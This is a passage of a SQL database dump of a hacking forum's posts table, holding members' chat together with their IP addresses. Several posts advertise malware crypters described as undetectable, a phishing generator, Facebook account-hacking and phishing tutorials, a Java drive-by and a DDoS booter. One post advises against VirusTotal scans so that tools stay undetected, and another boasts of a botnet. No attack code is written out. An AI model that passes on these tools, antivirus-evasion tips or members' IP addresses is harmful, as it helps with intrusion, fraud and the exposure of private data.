'a410d7a8b55be7826e72c67d77f067c3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3898', '737', '3746', '7', 'RE: Just voted', '0', '5', 'Timmy', '1349671475', 'Where did you vote and for what did you vote? I agree LH is the best forum plus it discourages Skid programs also has more blackhat stuff. I actually love the Movie RIPs and deep web stuff on LH.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '9059554743ec98a6683949b8bd560e86', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3899', '734', '3733', '3', 'RE: Downtime, PMs and Members', '0', '5', 'Timmy', '1349671507', 'Sucks bro hope you get Google to unban us.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'fb00ff0cbb726a55e5efa30da36fe649', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3900', '517', '2564', '34', 'RE: Spiderman Signature Tutorial', '0', '5', 'Timmy', '1349671588', 'Thanks it\'s a nice tutorial, very awesome signatuer.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'f2d3ae98a541f38c5f4e3c67aeb4f611', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3901', '765', '0', '46', 'Vulcan Private Pisher Generator', '0', '7', 'Romdu62', '1349671864', '[align=center] [img]http://gyazo.com/1b3507de6b1b9967501ffd72d323c4e1.png?1348626039[/img] [url=http://elementscanner.net//?RE=e7411761ed24b382a447497c6f0d450e][img]http://elementscanner.net//image.php?ID=e7411761ed24b382a447497c6f0d450e[/img][/url] [url=http://www.mediafire.com/download.php?31lxh7q4hphfwp8][img]http://img254.imageshack.us/img254/9947/downloadnow.png[/img][/url][/align]', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '7fc0abfe65e3f1b5df581c1d6ffaad9a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3902', '766', '0', '20', '[3/14] War - Crypter [ScanTime] by cris', '0', '7', 'Romdu62', '1349672344', 'Hello, This crypter is FUD (3/14) [url=http://adf.ly/D1Y7q]Here is the scan of my virus..[/url] Before encryptions the name of your virus also has to be builded.exe.... [align=center][img]http://img15.hostingpics.net/pics/166786Capture.png[/img][/align] [align=center][url=http://adf.ly/D1Z1S]Stub Scan[/url] [url=http://adf.ly/D1Yen]War - Crypter Scan[/url][/align] [align=center][img]http://img15.hostingpics.net/pics/551328Capture2.png[/img][/align] After the encoding you will can changed the name ..... [align=center][b][url=http://adf.ly/D1Zqb]Download Link[/url][/b][/align]', '72.231.24.165', '1223104677', '0', '0', '7', '1349672385', '1', '3776c1db032259dc63c15e5dbeb9bb36', '0', '1349672385'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3903', '100', '240', '18', 'RE: [tut]Hack any facebook or account that use username ID and forum password', '0', '7', 'Romdu62', '1349672458', 'Very hard but good for pros and this is the best technique to hack facebook accounts.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '31eeff3716fe1f138adb278ddab77957', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3904', '750', '3828', '3', 'RE: Leaving', '0', '222', 'Exposé', '1349674382', 'Lol switching over to AF lulz...good luck with that...', '69.205.61.93', '1171078493', '1', '0', '0', '0', '1', '78368d9ceef5f47c38b8912a1865c3ba', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3905', '734', '3733', '3', 'RE: Downtime, PMs and Members', '0', '222', 'Exposé', '1349674419', 'As I said before I am willing to donate for a better server or whatever. :D', '69.205.61.93', '1171078493', '1', '0', '0', '0', '1', '1bfbd631fe8ff4b9b0c05a0f913cfce0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3906', '750', '3828', '3', 'RE: Leaving', '0', '62', 'R?????zo?', '1349685044', 'Sad to see you leaving really, good luck bro', '188.37.112.250', '-1138396934', '1', '0', '0', '0', '1', '26a0127d6cfa051cec0251ff075107ea', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3907', '695', '3547', '16', 'RE: If you need help...i\'m here!', '0', '62', 'R?????zo?', '1349686910', '[quote=\'t3h jok3r\' pid=\'3547\' dateline=\'1349495175\'] We actually have a user that needs something SE\'d. He might be willing to pay as well. Help Thread: http://l33thacking.net/thread-637.html [/quote] yeah, I still need this actually. would be awesome if you could help :)', '205.164.4.4', '-844889084', '1', '0', '0', '0', '1', 'bdbc1784412bd03a9347c85118f31879', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3908', '750', '3828', '3', 'RE: Leaving', '0', '205', 'mothered', '1349693290', 'You\'re quite a pleasant member, so It\'s not good news that you\'re leaving. Ultimately, It\'s your choice, so all the best with whatever you decide.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '24e4890f1d7ddfea22cf12f11c9c5144', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3909', '737', '3749', '7', 'RE: Just voted', '0', '205', 'mothered', '1349693996', '[quote=\'sirchamp\' pid=\'3749\' dateline=\'1349612943\'] Hf isnt garbage. Its full of trolls tough [/quote] HF Is just plain trash In It\'s entirety. Enough said.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'aa8a756ac9585c58c42a9dfd66225ebc', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3910', '743', '3792', '23', 'RE: I got a virus', '0', '205', 'mothered', '1349694238', 'Forget about the futility of scans etc. Hit a clean Installation of Windows, by deleting all existing partitions, and Install on the Unallocated disc space. Install the latest drivers via the Manufacturer\'s website thereafter. At least you can be rest assured, that upon first booting Into the Windows environment after formatting, your system will be free from all malicious content.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '9cfa9dc2187bc2765a2e78edf1cfa4ec', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3911', '745', '3798', '59', 'RE: [Leak] Huge Folder of Ebooks', '0', '205', 'mothered', '1349694506', 'Nice, very nice Indeed. I shall hit the download. Much appreciated.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '04e59b2df84966fbcb223ef70c92fce6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3912', '749', '3822', '4', 'RE: It\'s BreShiE!', '0', '53', 'sirchamp', '1349699559', 'Welcome. I have a few tools which were made by you. is this your site: breshie.com ?', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '703b0c97b18f34ba5e858043890a006c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3913', '767', '0', '74', 'Do you cheat/hack games?', '0', '53', 'sirchamp', '1349702535', 'I hack mostly in games. And you?', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', 'c6ce475c584b54759c99bbead850aff6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3914', '117', '296', '46', 'RE: Facebook Phishin* Website [tut]with pictures', '0', '225', 'Graycat', '1349702699', 'Thanks I will be sure to try this method.', '75.162.63.152', '1268924312', '0', '0', '0', '0', '1', '4175651c7f5b35e1efe7bb3193f88762', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3915', '713', '3640', '12', 'RE: How To Make A FUD Java Drive-By', '0', '225', 'Graycat', '1349702765', 'very cool method im going to try this tonight!', '75.162.63.152', '1268924312', '0', '0', '0', '0', '1', '5d7a044abb491e7fddb8c5adee064e29', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3916', '198', '713', '21', 'RE: [Tutorial] Setting up your own web Booter[Source Included]', '0', '225', 'Graycat', '1349702860', 'Thanks ive been looking for this', '75.162.63.152', '1268924312', '0', '0', '0', '0', '1', 'ef645610e898cd7fdaa7d894b685664d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3917', '190', '665', '56', 'RE: Copy and paste game', '0', '82', 'iTzIpod', '1349702907', 'http://www.touque.ca/EC/ICS2O/students/2011-02/ICS2O2A/AbdouN/images/4seasons.jpg', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '9e1153910946829b18654d392cd4ecc7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3918', '698', '3557', '7', 'RE: Skype group anyone?', '0', '82', 'iTzIpod', '1349703108', 'You did. I was talking to Rave though', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '25ffe1c1feb9c4f2f177824148d27673', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3919', '654', '3226', '9', 'RE: Make money typing captchas', '0', '82', 'iTzIpod', '1349703141', 'Alright. .Well I\'m not Moderator anymore so I won\'t be doing much.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'c02cec418b8b96e8346410811653acc8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3920', '759', '3871', '7', 'RE: Join the LH Skype Group!', '0', '82', 'iTzIpod', '1349703185', 'I\'m in it right? Just making sure. ?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'd1aac0bff88766fa1571eb09d0306fe0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3921', '763', '3891', '58', 'RE: [Announcement]Group Changes', '0', '82', 'iTzIpod', '1349703216', 'Thanks for the notice. Good luck with Unique someone..', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '83cdb12081ee337112bb65566635db8e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3922', '747', '3809', '3', 'RE: L33THACKING WAS NEVER SOLD!', '0', '82', 'iTzIpod', '1349703309', 'Just because I said the forum was dead in the VIP Section doesn\'t mean I was behind this. I just said lets try to make it active again because the VIP Section was inactive.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '3792edecc684fc9fd2b6a7f92bfdebf9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3923', '517', '2564', '34', 'RE: Spiderman Signature Tutorial', '0', '82', 'iTzIpod', '1349703455', 'Yeah. You\'re welcome . :D', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '9f13a826c19dbc4c6b7617f40c48ae1a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3924', '734', '3753', '3', 'RE: Downtime, PMs and Members', '0', '82', 'iTzIpod', '1349703525', '[quote=\'iTzGRONgamer61\' pid=\'3753\' dateline=\'1349614110\'] Traffic bots fuuuuuck :( this is a sad day for LH [/quote] ... I didn\'t use traffic bots so whatever you\'d say to me on Skype, meh I don\'t care.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '3ee3937315b9d99ed98e49efef13ded5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3925', '743', '3792', '23', 'RE: I got a virus', '0', '82', 'iTzIpod', '1349703619', 'I think I got rid of it. But I\'ll still discuss it with Anonymous. Thanks iTzGRONGamer61 for messaging him.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '0add2361e168fe953dd5b226569fb7a8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3926', '767', '3913', '74', 'RE: Do you cheat/hack games?', '0', '82', 'iTzIpod', '1349703669', 'I hack in certain PC Games. That\'s pretty much it :p Or maybe other systems/game consoles. Not that I know of.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '84d89eaf0d4157f043a432b4c7f0499b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3927', '98', '233', '20', 'RE: FREE UD RazorCrypter (Cracked)', '0', '237', 'Azwan81', '1349706134', 'There is no problem if your upload crypter to mediafire,just dont scan on virustotal,coz virus total will send data to any antivirus company for any type of tool your scan on virustotal,', '203.92.138.166', '-883127642', '0', '0', '0', '0', '1', '0d1c1705c54710825a638288c0d9bc3b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3928', '734', '3924', '3', 'RE: Downtime, PMs and Members', '0', '3', '??????????¢™', '1349706769', '[quote=\'iTzIpod\' pid=\'3924\' dateline=\'1349703525\'] [quote=\'iTzGRONgamer61\' pid=\'3753\' dateline=\'1349614110\'] Traffic bots fuuuuuck :( this is a sad day for LH [/quote] ... I didn\'t use traffic bots so whatever you\'d say to me on Skype, meh I don\'t care. [/quote] Off-Topic: Yo bro what happened to your staff position? You were very active. On-Topic: That has to sucks, hopefully you can get google to unban us so that we can actually get members from google by searching hacking forums or something.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', '14f1fe2874a53f34597822f468141051', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3929', '734', '3733', '3', 'RE: Downtime, PMs and Members', '0', '82', 'iTzIpod', '1349711548', 'I asked for a demotion. And asked t3h jok3r to remove everything off of me. So he did as I told him too. He stripped me from my position and took away my Userbars.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '76a25a1af010118e1fdbd9969ce61631', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3930', '767', '3913', '74', 'RE: Do you cheat/hack games?', '0', '62', 'R?????zo?', '1349713357', 'I hack in every game I can that will take me advantage over other players online. For singleplayer I only cheat for fun when im done with the game.', '89.214.177.70', '1507242310', '1', '0', '0', '0', '1', '8eb9211ce88f32685b1b09d60c8afa89', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3931', '768', '0', '19', '[Junk]Site Owner 00', '0', '243', 'I am invisible', '1349714744', 'Originally I had offered to buy L33thacking.net from t3h jok3r. Unfortunately, they are a scammer, and not a person to do business with. I had purchased the forum for the sum of $30.00 USD (only $18.00 USD was paid), but they never honored their end of the deal. In our deal, I was to receive: [list] [*]The domain [*]Their database [*]A full backup of the site [*]Any themes used on the site [/list] I haven\'t received any of these yet, and they have been spreading false rumors about us being involved in several attacks on their site. I apologize for any information I gave you that is no longer valid because of this incident. Unfortunately, I do not have control over scammers, and I can only prevent them from scamming others. [b]Here are screenshots to back my claims:[/b] [spoiler][img]http://imageshack.us/a/img854/6585/evidencen.png[/img][/spoiler] Once again, I hope you guys realize that this isn\'t my fault. Although I hope members of L33thacking see what a poor example of an owner t3h jok3r is. Additionally, I would like to inform you that we had nothing to do with their site\'s downtime, or the removal of their site from Google. [b]Update:[/b] [quote=\'t3h jok3r\'] Your staff have sold your sites information to me, your members don\'t like your site, your sites best members are coming to my site, your staff are leaving your site because they are getting paid to join my website and stay active here. Your site is almost finished, if you want I can make you an Admin and I can give you a video guarantee that this is a real deal and if I cheat you then you can do whatever you want to do. In return, close down your site and tell everyone to join L33THacking. I will also give you 40% of everything I earn. [/quote]', '93.182.129.86', '1572241750', '0', '0', '0', '0', '1', 'c0fa9eb99a9b5ad12988463403eb8832', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3932', '392', '1816', '9', 'RE: PPD Niches', '0', '228', 'VirtualLegend', '1349717684', 'I think no one is gonna share a PPD niche, because it\'s like giving money away, and besides that you\'re the competition. But if someone share\'s a PPD Niche than i will Vouch for him :D', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '52fb0d9b66952ac96bd11afd0e467371', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3933', '768', '3931', '19', '[Junk]Site Owner 00', '0', '1', 't3h jok3r', '1349719237', 'This thread has been junked.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3934', '734', '3929', '3', 'RE: Downtime, PMs and Members', '0', '1', 't3h jok3r', '1349719441', '[quote=\'iTzIpod\' pid=\'3929\' dateline=\'1349711548\'] I asked for a demotion. And asked t3h jok3r to remove everything off of me. So he did as I told him too. He stripped me from my position and took away my Userbars. [/quote] I thought you wanted to leave LH. If you want to still be part of LH and just not be mod then I can return the elite and your unique userbar.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '0662552161a7f1c4cce032ebc36363d7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3935', '98', '233', '20', 'RE: FREE UD RazorCrypter (Cracked)', '0', '214', 'Rave™', '1349719529', 'Dammit I was about to release this today', '66.203.52.145', '1120613521', '1', '0', '0', '0', '1', 'edc227ef1329d4dd57791a32da11b318', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3936', '734', '3733', '3', 'RE: Downtime, PMs and Members', '0', '1', 't3h jok3r', '1349719574', 'I\'m on a kindle so have to to double post. The person that was DDoSing us and spammed the whit out of us yesterday is the owner of Anarchy forums.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '048a2aebd7ba7958143dadd041fdba12', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3937', '747', '3922', '3', 'RE: L33THACKING WAS NEVER SOLD!', '0', '1', 't3h jok3r', '1349719746', '[quote=\'iTzIpod\' pid=\'3922\' dateline=\'1349703309\'] Just because I said the forum was dead in the VIP Section doesn\'t mean I was behind this. I just said lets try to make it active again because the VIP Section was inactive. [/quote] Let me go home and take screenshotd of you asking about using a traffic bot in LH. We went offline and got banned because of the traffic bot and DDoS attack.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '4fcb21aba184f0895d8b01bac794779f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3938', '747', '3809', '3', 'RE: L33THACKING WAS NEVER SOLD!', '0', '203', 'NeonLights', '1349723153', 'whats his forums il take it down with my 3500 zombies :DD', '67.68.75.160', '1128549280', '1', '0', '0', '0', '1', '00ccf1f51c82030a89005fe21c8b0aa7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3939', '763', '3921', '58', 'RE: [Announcement]Group Changes', '0', '62', 'R?????zo?', '1349724280', '[quote=\'iTzIpod\' pid=\'3921\' dateline=\'1349703216\'] Thanks for the notice. Good luck with Unique someone.. [/quote] I will take the leader over Unique group, if iTzIpod ever come back I will give it back, for now I will focus in keeping Unique alive.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '3f09bc64a1bea0e55098c4672e42fc4a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3940', '212', '849', '58', 'RE: Official New Groups Questions, Inquires, Policies and More', '0', '203', 'NeonLights', '1349725370', '[b]Name of group: Ratters[/b] [b]Group Description: A group for people who love blackhat and love ratting :D[/b] [b]Group Userbar: [img]http://imageshack.us/a/img802/7561/ratters.gif[/img]I DID NOT MAKE THIS USERBAR NOR TAKE ANY CREDITS FOR MAKING IT[/b] [b]Forum Name: Ratters[/b] [b]Forum Icon(34x34):i dont really have one :([/b] [b]Why LH should make this group official: Because its a nice fun group that many hackers on this forum will love :) and its unique :D and led by a sexy guy called neon :D lol[/b]', '67.68.75.160', '1128549280', '1', '0', '0', '0', '1', 'c9442b71849db3e9c33b2bf8c0d23c8a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3941', '763', '3939', '58', 'RE: [Announcement]Group Changes', '0', '1', 't3h jok3r', '1349726745', '[quote=\'R?????zo?\' pid=\'3939\' dateline=\'1349724280\'] [quote=\'iTzIpod\' pid=\'3921\' dateline=\'1349703216\'] Thanks for the notice. Good luck with Unique someone.. [/quote] I will take the leader over Unique group, if iTzIpod ever come back I will give it back, for now I will focus in keeping Unique alive. [/quote] Thanks for accepting the opportunity to become the leader of the Unique group.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '2b366e08c50f0ea04d023a8c3d59636d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3942', '763', '3891', '58', 'RE: [Announcement]Group Changes', '0', '214', 'Rave™', '1349727192', 'I would like to take ownership of Unique. I am very HQ and active. I will continue to be so.', '71.67.179.16', '1195619088', '1', '0', '0', '0', '1', 'bfac1cf8e3a0ed592a1159113ea95898', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, 